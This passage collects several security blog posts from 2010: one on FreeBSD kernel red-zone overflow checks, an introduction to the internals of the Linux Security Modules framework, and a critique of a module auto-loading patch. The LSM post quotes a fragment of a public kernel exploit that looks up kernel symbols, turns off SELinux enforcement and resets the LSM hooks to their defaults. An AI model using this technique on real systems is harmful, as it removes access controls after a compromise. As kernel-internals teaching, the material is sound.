                stack_print_ddb(&fst);
                if (redzone_panic)
                        panic("Stopping here.");
        }
}

Red-Zone in FreeBSD’s code
The last step is to see how those routines are utilized in kernel memory allocation functions to provide the buffer overflow detection feature. All of the code snippets below are part of the kern/kern_malloc.c file which implements the kernel’s dynamic memory allocation mechanism of FreeBSD. The setup of each redzone is part of kernel’s malloc() function.

void *
malloc(unsigned long size, struct malloc_type *mtp, int flags)
{
        int indx;
        struct malloc_type_internal *mtip;
        caddr_t va;
        uma_zone_t zone;
#if defined(DIAGNOSTIC) || defined(DEBUG_REDZONE)
        unsigned long osize = size;
#endif
  ...
#ifdef DEBUG_REDZONE
        size = redzone_size_ntor(size);
#endif

        if (size <= KMEM_ZMAX) {
  ...
#ifdef DEBUG_REDZONE
        if (va != NULL)
                va = redzone_setup(va, osize);
#endif
        return ((void *) va);
}

If the kernel is compiled with ‘DEBUG_REDZONE’ enabled, it will use the redzone_ntor_size() routine to calculate the allocation size and before returning the newly allocated VA space it will pass it to redzone_setup() in order to initialize a new red-zone for it.
The checks as you might have guessed are performed in free() since realloc() also results in calling free as you can see here:

void *
realloc(void *addr, unsigned long size, struct malloc_type *mtp, int flags)
{
        uma_slab_t slab;
        unsigned long alloc;
        void *newaddr;
  ...
#ifdef DEBUG_REDZONE
        slab = NULL;
        alloc = redzone_get_size(addr);
#else
        slab = vtoslab((vm_offset_t)addr & ~(UMA_SLAB_MASK));
  ...
         /* Copy over original contents */
         bcopy(addr, newaddr, min(size, alloc));
         free(addr, mtp);
         return (newaddr);
}

Which by the end of the function frees the old memory space before returning the newly allocated one. The call to free() leads to the actual redzone check.

void
free(void *addr, struct malloc_type *mtp)
{
        uma_slab_t slab;
        u_long size;
  ...
#ifdef DEBUG_REDZONE
        redzone_check(addr);
        addr = redzone_addr_ntor(addr);
#endif
  ...
        malloc_type_freed(mtp, size);
}

So, it will check that there was no corruption in the red-zone that protected the space to be freed.

Although bypassing this this quite straightforward I won’t discuss it since there is no public resource demonstrating it and I always write only for information that is already publicly available.

Written by xorl

December 21, 2010 at 19:12

Posted in freebsd, security

Introduction to Linux Security Modules (LSM)

with 2 comments

In this post I’ll give a brief explanation of how “Linux Security Modules” feature is implemented in the kernel. First of all this is a clever abstraction layer which allows different security modules to be safely loaded and unloaded without messing with the kernel’s code directly.
The code snippets were taken from 2.6.36 release of the Linux kernel. However, the original implementation was developed in 2001.

Hooking and Capabilities
A look in include/linux/security.h reveals a huge structure of function pointers. A snippet of that structure is shown below.

struct security_operations {
        char name[SECURITY_NAME_MAX + 1];

        int (*ptrace_access_check) (struct task_struct *child, unsigned int mode);
        int (*ptrace_traceme) (struct task_struct *parent);
        int (*capget) (struct task_struct *target,
                       kernel_cap_t *effective,
                       kernel_cap_t *inheritable, kernel_cap_t *permitted);
        int (*capset) (struct cred *new,
                       const struct cred *old,
                       const kernel_cap_t *effective,
                       const kernel_cap_t *inheritable,
                       const kernel_cap_t *permitted);
        int (*capable) (struct task_struct *tsk, const struct cred *cred,
                        int cap, int audit);
        int (*sysctl) (struct ctl_table *table, int op);
     ...
        int (*audit_rule_match) (u32 secid, u32 field, u32 op, void *lsmrule,
                                 struct audit_context *actx);
        void (*audit_rule_free) (void *lsmrule);
#endif /* CONFIG_AUDIT */
};

These are predefined and documented callback functions that a security module can utilize to perform some security task in the specified function. The security header file then defines a series of security operations functions which by default do nothing at all in most cases. Here is an example snippet of these definitions.

/*
 * This is the default capabilities functionality.  Most of these functions
 * are just stubbed out, but a few must call the proper capable code.
 */

static inline int security_init(void)
{
        return 0;
}

static inline int security_ptrace_access_check(struct task_struct *child,
                                             unsigned int mode)
{
        return cap_ptrace_access_check(child, mode);
}

As you can see, some of the defined security operations will use the POSIX capabilities checks such as the security_ptrace_access_check() which is used in kernel/ptrace.c code like this:

int __ptrace_may_access(struct task_struct *task, unsigned int mode)
{
        const struct cred *cred = current_cred(), *tcred;
     ...
        return security_ptrace_access_check(task, mode);
}

And the capability routine is placed in security/commoncap.c (that stands for “Common Capabilities”). It’s nothing more than a simple capability check which uses RCU locking.

/**
 * cap_ptrace_access_check - Determine whether the current process may access
 *                         another
 * @child: The process to be accessed
 * @mode: The mode of attachment.
 *
 * Determine whether a process may access another, returning 0 if permission
 * granted, -ve if denied.
 */
int cap_ptrace_access_check(struct task_struct *child, unsigned int mode)
{
        int ret = 0;

        rcu_read_lock();
        if (!cap_issubset(__task_cred(child)->cap_permitted,
                          current_cred()->cap_permitted) &&
            !capable(CAP_SYS_PTRACE))
                ret = -EPERM;
        rcu_read_unlock();
        return ret;
}

LSM Framework Initialization
Now that you have a basic understanding of how LSMs such as SELinux, AppArmor, Tomoyo etc. operate in order to hook to Linux kernel routines we can move to the next topic. This means jumping to security/security.c file…
By default, Linux kernel initializes LSM like this:

/* Boot-time LSM user choice */
static __initdata char chosen_lsm[SECURITY_NAME_MAX + 1] =
        CONFIG_DEFAULT_SECURITY;

/* things that live in capability.c */
extern void __init security_fixup_ops(struct security_operations *ops);

static struct security_operations *security_ops;
static struct security_operations default_security_ops = {
        .name   = "default",
};

The default security options include just the POSIX capabilities check as we saw in the previous section. In include/linux/init.h header file we can find two initialization callback functions that are normally used to define the beginning and the end of a series of routines that the LSM needs to inialize itself.

/*
 * Used for initialization calls..
 */
typedef int (*initcall_t)(void);
typedef void (*exitcall_t)(void);
     ...
extern initcall_t __security_initcall_start[], __security_initcall_end[];

Back to security/security.c there’s the actual security module initialization function.

/**
 * security_init - initializes the security framework
 *
 * This should be called early in the kernel initialization sequence.
 */
int __init security_init(void)
{
        printk(KERN_INFO "Security Framework initialized\n");

        security_fixup_ops(&default_security_ops);
        security_ops = &default_security_ops;
        do_security_initcalls();

        return 0;
}

The first call leads to a security/capability.c function that initializes the passed ‘security_ops’ structure with the available routines as you can see in the snippet here:

#define set_to_cap_if_null(ops, function)                               \
        do {                                                            \
                if (!ops->function) {                                   \
                        ops->function = cap_##function;                 \
                        pr_debug("Had to override the " #function       \
                                 " security operation with the default.\n");\
                        }                                               \
        } while (0)

void __init security_fixup_ops(struct security_operations *ops)
{
        set_to_cap_if_null(ops, ptrace_access_check);
        set_to_cap_if_null(ops, ptrace_traceme);
        set_to_cap_if_null(ops, capget);
        set_to_cap_if_null(ops, capset);
     ...
}

Then security_init() will update kernel’s ‘security_ops’ structure with the initialized one and make a call to do_security_initcalls() which basically nothing more than a loop that will call all of the functions defined in the previously mentioned include/linux/init.h callbacks.

static void __init do_security_initcalls(void)
{
        initcall_t *call;
        call = __security_initcall_start;
        while (call < __security_initcall_end) {
                (*call) ();
                call++;
        }
}

Also, in security/security.c we can find the actual hooks that are performed by default (LSMs implement their own). Here is a sample of that.

int security_ptrace_access_check(struct task_struct *child, unsigned int mode)
{
        return security_ops->ptrace_access_check(child, mode);
}

int security_ptrace_traceme(struct task_struct *parent)
{
        return security_ops->ptrace_traceme(parent);
}

Registration of an LSM
Knowing how LSM hooking and initialization work in general we can move to the next step which is how a security framework is registered. The function to this is this one:

/**
 * register_security - registers a security framework with the kernel
 * @ops: a pointer to the struct security_options that is to be registered
 *
 * This function allows a security module to register itself with the
 * kernel security subsystem.  Some rudimentary checking is done on the @ops
 * value passed to this function. You'll need to check first if your LSM
 * is allowed to register its @ops by calling security_module_enable(@ops).
 *
 * If there is already a security module registered with the kernel,
 * an error will be returned.  Otherwise %0 is returned on success.
 */
int __init register_security(struct security_operations *ops)
{
        if (verify(ops)) {
                printk(KERN_DEBUG "%s could not verify "
                       "security_operations structure.\n", __func__);
                return -EINVAL;
        }

        if (security_ops != &default_security_ops)
                return -EAGAIN;

        security_ops = ops;

        return 0;
}

The code is very straightforward. It will check that the given structure isn’t pointing to NULL using verify() which is shown below. Then, before setting the kernel’s ‘security_ops’ to the LSM’s one it checks that the structure passed to it is not the default one which is already being used.

static inline int __init verify(struct security_operations *ops)
{
        /* verify the security_operations structure exists */
        if (!ops)
                return -EINVAL;
        security_fixup_ops(ops);
        return 0;
}

Load LSM on Boot
The LSM framework provide the feature of setting a module to be loaded at boot time. This is done through another function of security/security.c which updates the previously discussed kernel’s values to use the selected LSM instead of the default one.

/**
 * security_module_enable - Load given security module on boot ?
 * @ops: a pointer to the struct security_operations that is to be checked.
 *
 * Each LSM must pass this method before registering its own operations
 * to avoid security registration races. This method may also be used
 * to check if your LSM is currently loaded during kernel initialization.
 *
 * Return true if:
 *      -The passed LSM is the one chosen by user at boot time,
 *      -or the passed LSM is configured as the default and the user did not
 *       choose an alternate LSM at boot time,
 *      -or there is no default LSM set and the user didn't specify a
 *       specific LSM and we're the first to ask for registration permission,
 *      -or the passed LSM is currently loaded.
 * Otherwise, return false.
 */
int __init security_module_enable(struct security_operations *ops)
{
        if (!*chosen_lsm)
                strncpy(chosen_lsm, ops->name, SECURITY_NAME_MAX);
        else if (strncmp(ops->name, chosen_lsm, SECURITY_NAME_MAX))
                return 0;

        return 1;
}

You can read the comment which is very informative and then you can see that this is nothing more than copying the chosen one to the kernel’s ‘chosen_lsm’ array shown earlier.

Resetting LSM to default
Finally, we have probably the most useful task from an exploit developer’s point of view. This is resetting the LSM framework back to its default. Inside security/security.c the routine that does exactly this, is very simple…

void reset_security_ops(void)
{
        security_ops = &default_security_ops;
}

Since there is already public exploit code that does exactly this, I’ll write about it too.

What spender does in own_the_kernel() to disable AppArmor and/or SELinux is just what the above reset_security_ops() function does.

        security_ops = (unsigned long *)get_kernel_sym("security_ops");
        default_security_ops = get_kernel_sym("default_security_ops");
        sel_read_enforce = get_kernel_sym("sel_read_enforce");
   ...
        // disable SELinux
        if (selinux_enforcing && *selinux_enforcing) {
                what_we_do = 2;
                *selinux_enforcing = 0;
        }

        if (!selinux_enabled || (selinux_enabled && *selinux_enabled == 0)) {
                // trash LSM
                if (default_security_ops && security_ops) {
                        if (*security_ops != default_security_ops)
                                what_we_do = 3;
                        *security_ops = default_security_ops;
                }
        }

He obtains the kernel symbols through either ‘/proc/kallsyms’ or ‘/proc/ksyms’ and then just changes them to the default ones. His exploit includes a feature of making the system look like it’s set with SELinux on enforcing mode but this is out of the scope of this post since it is SELinux specific.

I intentionally omitted some details such as security_initcall() macro but I’ll discuss it in more detail in future posts dealing with some popular LSMs including SELinux, Tomoyo, SMACK and AppArmor. After all, this was just an introduction.

Written by xorl

December 20, 2010 at 16:38

Posted in linux, security

Linux kernel Disable Auto-Loading of Kernel Modules

with 2 comments

Yesterday, I saw this email and I was like WTF?!
The patch is to simply comment out MODULE_ALIAS_NETPROTO() macros of RDS and ECONET protocols but seriously… Is this a security patch?
What? Linux developers are too cool for a simple patch such as grsecurity’s MODHARDEN?
If someone was about to own a system using a local root on some exotic protocol family he probably have done this before his bug was killed. So, the aim of this patch is to avoid other vulnerabilities on those two modules by completely disabling them. Then what’s the purpose of compiling them and keeping them in Linux kernel?
I don’t like spender (and he doesn’t like me either) but that has nothing to do with his MODHARDEN patch which is a very sane approach for a mitigation strategy against such vulnerabilities.

Written by xorl

December 1, 2010 at 07:59

Posted in linux, security